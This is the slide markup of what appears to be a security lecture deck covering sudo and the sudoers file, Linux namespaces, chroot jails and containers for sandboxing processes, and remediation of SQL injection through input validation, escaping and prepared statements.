          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="17958406">
            <a:off x="4890992" y="2699420"/>
            <a:ext cx="473794" cy="2780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6EE7C2E-87CB-DC58-D2CE-69D141BB8282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="14273609">
            <a:off x="5928263" y="2699490"/>
            <a:ext cx="473794" cy="2780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61FF43-BD64-5D77-45FE-1CB2AF88EE84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4582543" y="30702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close..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098A27-35FE-ADFA-3FE1-1DA68784FF00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5977956" y="3070218"/>
            <a:ext cx="97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reopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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622140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05160-235C-89CF-1655-EFD740AE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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  &lt;&lt;command&gt;&gt;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7A85BC-2A4E-83A2-6250-8828FA20E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591" y="2138266"/>
            <a:ext cx="7982642" cy="2229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CB8896-6EF3-223D-8C2A-7874F5B9A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146" y="4848181"/>
            <a:ext cx="4134208" cy="10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806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7A76F-7FEC-8ED5-48D2-ECCD4C5B4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EB11F-AF30-D811-265C-6AD542F5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7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visudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>     :  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>editing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>   /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sudoers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30B192-375A-0C02-ED1A-C1A998937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09" y="1343741"/>
            <a:ext cx="8790432" cy="5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9886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E6E45-5F9C-2A2B-96E2-9A9BBC5CC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72732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Security Notes on Process -&gt; "filesystem" :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, containers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21430023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3C567-4AD8-2349-37C7-CCC07AD1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9FE975-DD2A-04A0-6F21-69F460DC8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0" y="1865419"/>
            <a:ext cx="2000423" cy="94115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F75C5EA-D973-BF94-6596-6BF3217601B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2600231">
            <a:off x="2132352" y="2314430"/>
            <a:ext cx="781693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BE53A-DCDE-503B-9838-BB8F2BFB6D7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218127" y="2806571"/>
            <a:ext cx="519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userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  </a:t>
            </a:r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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> of the 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95D230-C6C6-1843-8232-54BE5FFC83A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273010" y="3553122"/>
            <a:ext cx="4803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FileSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>namespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  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root Filesystem "/" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> accessible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ECE3C-F460-BA4B-ABBB-BAF0014368CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2801893" y="2670746"/>
            <a:ext cx="2261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Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Virtualization</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="24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1D7B74D-70C4-35F3-A8B1-6B18B3F29034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20742164">
            <a:off x="5330582" y="3056340"/>
            <a:ext cx="54982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AF608FA-AE7A-688C-4457-01E5CEA8BC25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21401959">
            <a:off x="5330581" y="3755610"/>
            <a:ext cx="54982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EE1B1A2-A0E6-88A2-45AE-57F14779EB82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1169941">
            <a:off x="5324394" y="4464753"/>
            <a:ext cx="54982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E93E2F-A3D0-014B-79E5-711B64B5CA50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273010" y="4505622"/>
            <a:ext cx="5037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Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>namespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  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network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>addresses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> are accessible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DAD7892-A0A2-7E62-B582-A6121415D3D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3057405">
            <a:off x="5339775" y="5314558"/>
            <a:ext cx="54982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E48F11-1D16-56AE-54E0-EF7414710F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283928" y="5576103"/>
            <a:ext cx="4328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Process, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>, ...  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  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... are accessible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98348F-FA07-DE02-DD01-9CE30A8833EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6034088" y="2547938"/>
            <a:ext cx="5576887" cy="95380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412EC7-0C66-4631-8A86-CA2EEEFEB15E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6186487" y="4435498"/>
            <a:ext cx="5576887" cy="205737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59EE6FA-8945-1313-60AE-A7E170B14AA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/>
              <a:t>Notice on Securing Process</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>using Process Restrictions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33125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698D5-65DB-1E2E-FCC5-049892382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470D2-4459-E1D6-8292-AA84C4DA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mount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ,   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>FileSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>namespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>,   </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Rootfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> "/"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2B606-DE21-5E5D-12FD-2BC35B846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13" y="2158223"/>
            <a:ext cx="8695173" cy="326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9243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F3977-68E2-2FA7-56EF-82D5A07B1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D4D7-E8AD-D082-4C9A-1BBC9936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chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>      Change Root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>    root "/"  -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>jail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AC791-64C3-A789-825C-BE9B366CF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02" y="2501151"/>
            <a:ext cx="6306096" cy="26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097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42DA4-D394-225E-1CB0-11A4C1E2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FCC0-F607-5BB7-819B-F3C1C666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9" y="365125"/>
            <a:ext cx="11572874" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Historically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> to "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>" a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>webserver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C153C-7568-86E3-F67D-D8BF925A8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447653"/>
            <a:ext cx="5772503" cy="3772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0B15AC-54B0-595C-1341-ACF2A9F52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490276"/>
            <a:ext cx="5819997" cy="400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2053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E4A5-113F-87AA-956A-8AA5A7B9B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208DF2-F9F7-FD32-EBBE-4F0801FF0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507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chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  [1/5]  (struggle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ChatGPT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 err="1"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> an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D0FDC8-4081-4DB4-AEEA-5744F0876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07" y="5067301"/>
            <a:ext cx="5827928" cy="1608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4A35C9-6DB1-A05C-B542-70C378198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23" y="1686042"/>
            <a:ext cx="5284928" cy="2419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163FFF-62DB-D00F-621F-74719F94F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78" y="4292830"/>
            <a:ext cx="5075360" cy="24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7007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3CF8-90B8-78B4-F1F7-2896F33AD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CBA62-2087-25A6-EB68-CE1B10646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507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chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  [2/5]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Preparing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chrooted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>jail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644C6-9C88-938E-3CDA-13B12BE0A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834" y="1453708"/>
            <a:ext cx="5277307" cy="51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969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C3EFE-3B5F-24C2-58BE-82DA0ABB9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E5A-EE8C-D5DC-82B5-4EB5E286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chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> [3/5]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6BD0B-223A-5CFF-C919-245BB132D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239" y="1690688"/>
            <a:ext cx="6271392" cy="42283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E539E2-290B-7694-9497-7A36A7F3A0F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3624263" y="3895726"/>
            <a:ext cx="495300" cy="214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7739E-F040-8BEB-82DF-AEF8327A28D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3495675" y="3697684"/>
            <a:ext cx="6161955" cy="21697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4889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D35D-18BC-C950-908F-8021E13EF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95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SQL Injection [3/4] : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Remediation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>( = Correction, Mitigation, Fix)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658FC-5EDB-BA68-CD8B-78E29940262E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714625" y="1995488"/>
            <a:ext cx="822738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possibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> 1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>disallow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>special</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> chars in input, return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>error</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>validate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regular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> expression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>   = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t> input   (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>simply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>reject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>possibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> 2 : escape all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>special</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> chars, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>prepend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> "\" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>quote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>   = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>Sanitize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>inputs   (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>possibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> 3: use SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>never</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>concatenate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>literals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> for building SQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>          for params, use SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>-Variables (?1, ?2, ..)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111822637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17927-0BE8-BF50-F74C-7A92CFCA5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62BB0F-D0B9-72AC-B2C4-BED1A7AA58A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/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> [4/5]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CC2B05-F1A1-B0BB-2EAA-EC941C2D6676}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2381250" y="2619376"/>
            <a:ext cx="90801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an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> control over the process "java.exe",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>and can fork-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> process ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>he</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> ? 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NO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>even</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>  "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>"  file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> NOT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present</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>FileSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="24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3121622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FD858-BA27-6F0E-CEC8-9A83F693A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84E2-64F6-290A-E7FE-C5FAA535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27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chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> [5/5]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8D8EE-0302-53DD-FAD3-C5FB2252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54" y="947679"/>
            <a:ext cx="6468421" cy="1528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0A5D3-D185-67C0-2E3A-41E5D70C6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215" y="2819459"/>
            <a:ext cx="7474854" cy="300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4926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5658E-4D0E-FE24-9DC9-1C6C0079D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16259-F030-4F3F-DC98-C248194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Modern "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>"  :  Containers </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>                                             (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>lightweigth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>VMs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BA7DE-525D-BC10-D2DB-4FFE29927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810" y="2457313"/>
            <a:ext cx="3265453" cy="1550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54BD7-E32F-5F25-6A12-9743EE332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13" y="1837252"/>
            <a:ext cx="2305250" cy="1162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02FD5-DDD9-F08B-4736-3F4C7CEFA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947" y="5018611"/>
            <a:ext cx="2400508" cy="990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09854C-61C0-66DE-74F7-EC6201B32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285" y="3088984"/>
            <a:ext cx="2484335" cy="10364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E85E01-D3E8-3627-0E9F-FE34889D0897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152426" y="3051157"/>
            <a:ext cx="1958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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>legacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> root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67C3D3-1671-CE56-3454-D60499A1BB66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4060486" y="4008117"/>
            <a:ext cx="1205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rootless</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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16FC2-18DB-8054-1F34-50C53951A114}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3182035" y="6009297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api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2B8A3-1E27-99F5-9DCF-A7F2ACB7C3AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
